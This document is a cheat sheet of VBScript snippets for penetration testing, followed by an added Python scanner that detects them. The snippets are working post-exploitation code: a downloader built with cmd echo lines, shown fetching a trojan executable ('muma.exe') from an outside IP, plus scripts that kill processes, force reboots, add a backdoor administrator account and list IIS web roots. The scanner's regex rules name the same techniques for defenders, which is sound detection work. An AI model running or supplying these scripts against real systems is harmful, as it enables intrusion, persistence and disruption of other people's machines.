Commonly used VBS scripts for penetration testing

1. File download (for when no command output is returned)
echo iLocal = LCase(WScript.Arguments(1)) >iget.vbe
echo iRemote = LCase(WScript.Arguments(0)) >>iget.vbe
echo Set xPost = CreateObject("Microsoft.XMLHTTP") >>iget.vbe
echo xPost.Open "GET",iRemote,0 >>iget.vbe
echo xPost.Send() >>iget.vbe
echo Set sGet = CreateObject("ADODB.Stream") >>iget.vbe
echo sGet.Mode = 3 >>iget.vbe
echo sGet.Type = 1 >>iget.vbe
echo sGet.Open() >>iget.vbe
echo sGet.Write(xPost.responseBody) >>iget.vbe
echo sGet.SaveToFile iLocal,2 >>iget.vbe

Usage: cscript 0x007.vbs http://111.111.111.111/muma.exe muma.exe

2. List processes
@echo for each ps in getobject _ >ps.vbs
@echo ("winmgmts:\\.\root\cimv2:win32_process").instances_ >>ps.vbs
@echo WScript.Echo ps.handle^&vbtab^&ps.name^&vbtab^&ps.executablepath:next >>ps.vbs

Usage: cscript 0x007.vbs

3. Terminate a process
@echo for each ps in getobject _ >pskill.vbs
@echo ("winmgmts:\\.\root\cimv2:win32_process").instances_ >>pskill.vbs
@echo if ps.handle=WScript.Arguments(0) then WScript.Echo ps.terminate:end if:next >>pskill.vbs

Usage: cscript 0x007.vbs pid

4. Reboot the system
@echo for each os in getobject _ >reboot.vbs
@echo ("winmgmts:!\\.\root\cimv2:win32_operatingsystem").instances_ >>reboot.vbs
@echo os.win32shutdown(2):next >>reboot.vbs


5. Add a user

Set a=CreateObject("Shell.Users")
Set z=a.create("oo")
z.changePassword "xx",""
z.setting("AccountType")=3

Or:

set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os)                          'get the ADSI interface (bind to the local machine)
Set oe=GetObject(os&"/Administrators,group")  'the Administrators group
Set od=ob.Create("user","lcx")                'create the user
od.SetPassword "123456"                       'set the password
od.SetInfo                                    'commit
Set of=GetObject(os&"/lcx,user")              'get the user object (the class belongs inside the ADsPath string)
oe.Add os&"/lcx"


6. Listing the physical directories of IIS virtual hosts with VBS

Set ObjService=GetObject("IIS://LocalHost/W3SVC")
For Each obj3w In ObjService
  If IsNumeric(obj3w.Name) Then
    sServerName=obj3w.ServerComment
    Set webSite = GetObject("IIS://Localhost/W3SVC/" & obj3w.Name & "/Root")
    ListAllWeb = ListAllWeb & obj3w.Name & String(25-Len(obj3w.Name)," ") & obj3w.ServerComment & "(" & webSite.Path & ")" & vbCrLf
  End If
Next
WScript.Echo ListAllWeb
Set ObjService=Nothing
WScript.Quit

Usage: cscript 0x007.vbs
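As an added, defender-side example that is not part of the original page: a Python scanner that reassembles a .vbs/.vbe file built with cmd echo redirection (sections 1 to 4) and flags the object/method combinations each script on this page depends on. The rule names and sample inputs are constructed for this example.

```python
import re

# Each rule lists patterns that must all occur (case-insensitive) for it to fire; the
# objects and methods are those the page's scripts rely on, the names are constructed.
RULES = {
    "xmlhttp_download_to_disk":  (r"microsoft\.xmlhttp", r"adodb\.stream", r"\.savetofile\b"),
    "wmi_process_terminate":     (r"winmgmts:", r"win32_process", r"\.terminate\b"),
    "wmi_forced_shutdown":       (r"winmgmts:", r"win32_operatingsystem", r"win32shutdown"),
    "adsi_user_to_admin_group":  (r"winnt://", r'\.create\s*\(\s*"user"', r"/administrators,group"),
    "shell_users_admin_account": (r"shell\.users", r'setting\s*\(\s*"accounttype"\s*\)\s*=\s*3'),
}

# One cmd line of the "build the script with echo" technique from sections 1-4, e.g.
# `echo <script line> >target.vbe` or `@echo <script line> >>target.vbs`.
ECHO_LINE = re.compile(
    r"^\s*@?echo\s+(?P<body>.*?)\s*>>?\s*(?P<target>\S+\.vb[se])\s*$",
    re.IGNORECASE | re.MULTILINE,
)

def reassemble_echo_scripts(transcript):
    """Return {target_file: script_text} for each .vbs/.vbe built via echo redirection."""
    parts = {}
    for m in ECHO_LINE.finditer(transcript):
        body = m.group("body").replace("^&", "&")  # undo cmd's escape of &
        parts.setdefault(m.group("target").lower(), []).append(body)
    return {target: "\n".join(lines) for target, lines in parts.items()}

def classify(script_text):
    """Return the sorted names of all rules whose patterns all match the script text."""
    return sorted(name for name, patterns in RULES.items()
                  if all(re.search(p, script_text, re.IGNORECASE) for p in patterns))

# Constructed sample: a cmd transcript building the downloader (section 1) and the
# process killer (section 3) line by line, with the object name restored to WScript.
SAMPLE_TRANSCRIPT = r"""echo Set xPost = CreateObject("Microsoft.XMLHTTP") >iget.vbe
echo xPost.Open "GET",iRemote,0 >>iget.vbe
echo Set sGet = CreateObject("ADODB.Stream") >>iget.vbe
echo sGet.SaveToFile iLocal,2 >>iget.vbe
@echo for each ps in getobject _ >pskill.vbs
@echo ("winmgmts:\\.\root\cimv2:win32_process").instances_ >>pskill.vbs
@echo if ps.handle=WScript.arguments(0) then WScript.echo ps.terminate:end if:next >>pskill.vbs
"""

# Constructed benign script: a read-only WMI query, so no rule should fire.
BENIGN_SCRIPT = r"""Set svc = GetObject("winmgmts:\\.\root\cimv2").ExecQuery("Select Name From Win32_Service")
For Each s In svc: WScript.Echo s.Name: Next
"""

FINDINGS = {t: classify(body) for t, body in reassemble_echo_scripts(SAMPLE_TRANSCRIPT).items()}
```

FINDINGS maps each reassembled file to the rules it triggered; a plain VBScript can be passed straight to classify().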



